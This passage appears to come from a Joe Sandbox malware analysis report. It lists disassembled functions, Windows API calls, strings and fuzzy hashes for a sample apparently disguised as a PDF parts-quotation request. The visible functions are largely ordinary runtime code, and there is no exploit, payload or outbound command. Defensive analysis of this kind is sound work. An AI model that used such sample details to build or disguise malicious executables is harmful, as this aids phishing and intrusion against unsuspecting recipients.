                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1705453755-0
                                                                  • Opcode ID: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
                                                                  • Instruction ID: b10ecea80051317f6f9f22418306f55b592432caa36be08f158689042811178c
                                                                  • Opcode Fuzzy Hash: decc225e8913f5a36f80010b72edd2955afa4d6cef0445e91f91f8cf67aaa865
                                                                  • Instruction Fuzzy Hash: 751112B5E00209AFDB04CF99C880DEFF7F9EFC8304B14C569A908EB254E6319A01CB90
                                                                  Function 0295A74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0295A76A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                  • Instruction ID: 1d99dc87d470fd9e2fdf653d67fdd9fcf68d4f38163148352253a96b403a42b8
                                                                  • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                                  • Instruction Fuzzy Hash: C7E0D835B0022417D711E9585C80DFA736D979C310F00427EBD08C7340FEB09D804BE8
                                                                  Function 0295B714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(?,0297C106,00000000,0297C11E), ref: 0295B722
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: 5193091fa0ab451dcf44ccfa54ae074c5d7482020c84d8d70eb623eb3cd998ba
                                                                  • Instruction ID: 765792bb1dd962a60c7c35aacb46c0ab7500d5ba7ae3197732ad678e51c1d3a9
                                                                  • Opcode Fuzzy Hash: 5193091fa0ab451dcf44ccfa54ae074c5d7482020c84d8d70eb623eb3cd998ba
                                                                  • Instruction Fuzzy Hash: 9CF0D4B4A483119FC350DF28E541A2977E9FF88B14F409D29E89CD7380E7349828CF62
                                                                  Function 0295A798 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0295BDFA,00000000,0295C013,?,?,00000000,00000000), ref: 0295A7AB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                  • Instruction ID: 574d4c8e746b78294706f463e0da806ad816d401f1704704356bd8537b697de9
                                                                  • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                                  • Instruction Fuzzy Hash: FBD05EA630E2742AA220915A2D94D7B5AECCAC97A1F00853EF948C6200E2108C0697B5
                                                                  Function 02959194 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID:
                                                                  • API String ID: 481472006-0
                                                                  • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                  • Instruction ID: 4491f48180c7c410c1aec477f0d983383f2554924af38daac1ed1cea268e7082
                                                                  • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                                  • Instruction Fuzzy Hash: A8A0110080A830028A803B280C0223A3088A880B20FC80F80ACF8802E0EE2E022082E3
                                                                  Function 029520C4 Relevance: .1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                  Function 0295D21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0295D225
                                                                    • Part of subcall function 0295D1F0: GetProcAddress.KERNEL32(00000000), ref: 0295D209
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                  • API String ID: 1646373207-1918263038
                                                                  • Opcode ID: dd39941c5aed80b2aebdb94ed9797d4b5abb59162ff8be8ef517098d8a09a088
                                                                  • Instruction ID: 723ec46efe16037a72cc0c642af0732ff9d718f56999d2893de2d5b989331be4
                                                                  • Opcode Fuzzy Hash: dd39941c5aed80b2aebdb94ed9797d4b5abb59162ff8be8ef517098d8a09a088
                                                                  • Instruction Fuzzy Hash: BC414F61F893655B560DEB7E751053B7BEADA887107A0441ABC0CCA785DE20BC918F3E
                                                                  Function 02966E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02966E66
                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02966E77
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02966E87
                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02966E97
                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02966EA7
                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02966EB7
                                                                  • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02966EC7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                  • API String ID: 667068680-2233174745
                                                                  • Opcode ID: ec47aae98e83a4eccecfd8604435dbac74c4392bd0cb16bd234324e5de52e877
                                                                  • Instruction ID: e7d4105ba8f7ef25943f4b1fe01ed5adc2b4451e98698d77501b06df9f2be084
                                                                  • Opcode Fuzzy Hash: ec47aae98e83a4eccecfd8604435dbac74c4392bd0cb16bd234324e5de52e877
                                                                  • Instruction Fuzzy Hash: 22F050B2B8E3316EB705FFB09CC6C3727DDAED06457401939780265542EBBD88244F60
                                                                  Function 02952530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029528CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                  • API String ID: 2030045667-32948583
                                                                  • Opcode ID: 8dce429ba7246632b61e4608c35f2c5222f8181f7fc4b93d38d00b28144abb7a
                                                                  • Instruction ID: 09b1c84884e13386d1b800bab482e353da83e0619733e85aaa606a1be2faf721
                                                                  • Opcode Fuzzy Hash: 8dce429ba7246632b61e4608c35f2c5222f8181f7fc4b93d38d00b28144abb7a
                                                                  • Instruction Fuzzy Hash: 98A1BF30F043B48BDB21EB2CCC84B99BBE9EB49750F1440E5ED49AB285CB759986CF51
                                                                  Function 0295252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • An unexpected memory leak has occurred. , xrefs: 02952690
                                                                  • The unexpected small block leaks are:, xrefs: 02952707
                                                                  • Unexpected Memory Leak, xrefs: 029528C0
                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02952849
                                                                  • bytes: , xrefs: 0295275D
                                                                  • , xrefs: 02952814
                                                                  • 7, xrefs: 029526A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                  • API String ID: 0-2723507874
                                                                  • Opcode ID: 63526ab202f36068188c7e8cef3e2ecae3e6281cbf5e797c75c01fcd57edf2ee
                                                                  • Instruction ID: 93cf96a7f60e5831386792c9dd454a8ca3cef982651a10ae1803e8b81ecaf015
                                                                  • Opcode Fuzzy Hash: 63526ab202f36068188c7e8cef3e2ecae3e6281cbf5e797c75c01fcd57edf2ee
                                                                  • Instruction Fuzzy Hash: C571AF30F042B88BDB21DB2CCC84B99BBE9EB49754F1040E5DD49AB281DB759A85CF51
                                                                  Function 0295BD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,0295C013,?,?,00000000,00000000), ref: 0295BD7E
                                                                    • Part of subcall function 0295A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0295A76A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 4232894706-2493093252
                                                                  • Opcode ID: b1e2c42f11713df48e61f4bd65f96e745ab6381cfc4cbb95501f2fc7e6335928
                                                                  • Instruction ID: 0031f7cb941c775a4a46203eae8356864eabaf324284a1a06b48aa363f0a5f33
                                                                  • Opcode Fuzzy Hash: b1e2c42f11713df48e61f4bd65f96e745ab6381cfc4cbb95501f2fc7e6335928
                                                                  • Instruction Fuzzy Hash: EE615E34B003689BDF01EBB4D890ADFB7FB9FC9300F509536A905AB245DA35DA068B94
                                                                  Function 0296AE20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0296AE40
                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0296AE57
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0296AEEB
                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 0296AEF7
                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 0296AF0B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Read$HandleModule
                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                  • API String ID: 2226866862-113032527
                                                                  • Opcode ID: b19132c60bc44d1ba06cf54a9292ff5b35dbbd87a415786b15e8cde47d1d15a2
                                                                  • Instruction ID: 5962bd194a30b1e3396858631253f84db0135341a4d2086b3c5686d133d404af
                                                                  • Opcode Fuzzy Hash: b19132c60bc44d1ba06cf54a9292ff5b35dbbd87a415786b15e8cde47d1d15a2
                                                                  • Instruction Fuzzy Hash: B73143B2A40305BFDB10DFA8CC89FBD77ECAF45364F444564EA54BB280D370A9509BA5
                                                                  Function 0295432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029543F3,?,?,029B07C8,?,?,0297D7A8,0295655D,0297C30D), ref: 02954365
                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029543F3,?,?,029B07C8,?,?,0297D7A8,0295655D,0297C30D), ref: 0295436B
                                                                  • GetStdHandle.KERNEL32(000000F5,029543B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029543F3,?,?,029B07C8), ref: 02954380
                                                                  • WriteFile.KERNEL32(00000000,000000F5,029543B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029543F3,?,?), ref: 02954386
                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029543A4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleWrite$Message
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1570097196-2970929446
                                                                  • Opcode ID: f03e8d6ba9a11468dee70080fa1a484f2798e974560f1bc23bbc9b04df99915f
                                                                  • Instruction ID: 4c1fc4e7d86f19b59288c41ce92dc2d192ee284cf5533b55224ee581f86c7be9
                                                                  • Opcode Fuzzy Hash: f03e8d6ba9a11468dee70080fa1a484f2798e974560f1bc23bbc9b04df99915f
                                                                  • Instruction Fuzzy Hash: AAF0BEA0BC836079FA50EA70AE46FB9275C5FC4F24F140A64BE69A80D0D7B060C4DB76
                                                                  Function 0295AE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0295ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0295ACE1
                                                                    • Part of subcall function 0295ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0295AD05
                                                                    • Part of subcall function 0295ACC4: GetModuleFileNameA.KERNEL32(02950000,?,00000105), ref: 0295AD20
                                                                    • Part of subcall function 0295ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0295ADB6
                                                                  • CharToOemA.USER32(?,?), ref: 0295AE83
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0295AEA0
                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0295AEA6
                                                                  • GetStdHandle.KERNEL32(000000F4,0295AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0295AEBB
                                                                  • WriteFile.KERNEL32(00000000,000000F4,0295AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0295AEC1
                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0295AEE3
                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0295AEF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 185507032-0
                                                                  • Opcode ID: 73f61923356f1991580a1774e3fae6ec94ee7026d7b65db26fdf45876b7d161c
                                                                  • Instruction ID: 5eae518c5d1b2d748de7cd807eafcada918562ec7469570f9e0cb521398c67f4
                                                                  • Opcode Fuzzy Hash: 73f61923356f1991580a1774e3fae6ec94ee7026d7b65db26fdf45876b7d161c
                                                                  • Instruction Fuzzy Hash: FA112EB26483147AD600EB94DC81F9B77EDAB85700F800926BF54D60D1DA74E9448F66
                                                                  Function 0295E514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0295E5AD
                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0295E5C9
                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0295E602
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0295E67F
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0295E698
